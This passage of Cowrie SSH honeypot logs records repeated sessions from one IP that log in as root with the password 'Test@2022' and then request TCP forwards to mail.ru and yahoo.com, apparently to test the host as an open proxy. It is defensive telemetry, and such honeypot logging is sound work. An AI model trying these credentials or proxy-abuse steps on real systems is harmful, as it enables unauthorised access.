aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.320721Z","src_ip":"77.83.207.83","session":"23bdeb949165"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.570133Z","src_ip":"77.83.207.83","session":"23bdeb949165"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10080,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10080","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.621590Z","session":"23bdeb949165"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.671739Z","src_ip":"77.83.207.83","session":"23bdeb949165"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":29226,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29226","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.812478Z","session":"23bdeb949165"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.862688Z","src_ip":"77.83.207.83","session":"23bdeb949165"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":5516,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5516","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.004576Z","session":"23bdeb949165"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.054968Z","src_ip":"77.83.207.83","session":"23bdeb949165"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.105969Z","src_ip":"77.83.207.83","session":"23bdeb949165"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3842,"dst_ip":"1.2.3.4","dst_port":22,"session":"be592024437a","protocol":"ssh","message":"New connection: 77.83.207.83:3842 (1.2.3.4:22) [session: be592024437a]","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.157421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.158277Z","src_ip":"77.83.207.83","session":"be592024437a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.210515Z","src_ip":"77.83.207.83","session":"be592024437a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.471898Z","src_ip":"77.83.207.83","session":"be592024437a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21765,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21765","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.525758Z","session":"be592024437a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.578242Z","src_ip":"77.83.207.83","session":"be592024437a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":27141,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27141","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.726882Z","session":"be592024437a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.779330Z","src_ip":"77.83.207.83","session":"be592024437a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":8956,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8956","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.926885Z","session":"be592024437a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:33.979411Z","src_ip":"77.83.207.83","session":"be592024437a"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.033293Z","src_ip":"77.83.207.83","session":"be592024437a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3951,"dst_ip":"1.2.3.4","dst_port":22,"session":"11cb96e9e295","protocol":"ssh","message":"New connection: 77.83.207.83:3951 (1.2.3.4:22) [session: 11cb96e9e295]","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.081489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.091495Z","src_ip":"77.83.207.83","session":"11cb96e9e295"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.131692Z","src_ip":"77.83.207.83","session":"11cb96e9e295"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.380222Z","src_ip":"77.83.207.83","session":"11cb96e9e295"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30764,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30764","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.431007Z","session":"11cb96e9e295"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.481207Z","src_ip":"77.83.207.83","session":"11cb96e9e295"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11166,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11166","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.624514Z","session":"11cb96e9e295"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.674260Z","src_ip":"77.83.207.83","session":"11cb96e9e295"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":30251,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:30251","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.816067Z","session":"11cb96e9e295"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.865868Z","src_ip":"77.83.207.83","session":"11cb96e9e295"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.916269Z","src_ip":"77.83.207.83","session":"11cb96e9e295"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4050,"dst_ip":"1.2.3.4","dst_port":22,"session":"894d6ebbb7c0","protocol":"ssh","message":"New connection: 77.83.207.83:4050 (1.2.3.4:22) [session: 894d6ebbb7c0]","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.965947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:34.966754Z","src_ip":"77.83.207.83","session":"894d6ebbb7c0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.016923Z","src_ip":"77.83.207.83","session":"894d6ebbb7c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.266811Z","src_ip":"77.83.207.83","session":"894d6ebbb7c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4483,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4483","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.318288Z","session":"894d6ebbb7c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.368608Z","src_ip":"77.83.207.83","session":"894d6ebbb7c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":12168,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12168","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.512462Z","session":"894d6ebbb7c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.562533Z","src_ip":"77.83.207.83","session":"894d6ebbb7c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":12676,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12676","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.704402Z","session":"894d6ebbb7c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.754747Z","src_ip":"77.83.207.83","session":"894d6ebbb7c0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.805607Z","src_ip":"77.83.207.83","session":"894d6ebbb7c0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4146,"dst_ip":"1.2.3.4","dst_port":22,"session":"275cccbd48cd","protocol":"ssh","message":"New connection: 77.83.207.83:4146 (1.2.3.4:22) [session: 275cccbd48cd]","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.854969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.856480Z","src_ip":"77.83.207.83","session":"275cccbd48cd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:35.906831Z","src_ip":"77.83.207.83","session":"275cccbd48cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.157147Z","src_ip":"77.83.207.83","session":"275cccbd48cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17915,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17915","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.208523Z","session":"275cccbd48cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.258958Z","src_ip":"77.83.207.83","session":"275cccbd48cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":2603,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2603","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.400531Z","session":"275cccbd48cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.450738Z","src_ip":"77.83.207.83","session":"275cccbd48cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":29821,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29821","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.596523Z","session":"275cccbd48cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.646797Z","src_ip":"77.83.207.83","session":"275cccbd48cd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.697842Z","src_ip":"77.83.207.83","session":"275cccbd48cd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4254,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb1c716ab905","protocol":"ssh","message":"New connection: 77.83.207.83:4254 (1.2.3.4:22) [session: bb1c716ab905]","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.746991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.747961Z","src_ip":"77.83.207.83","session":"bb1c716ab905"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25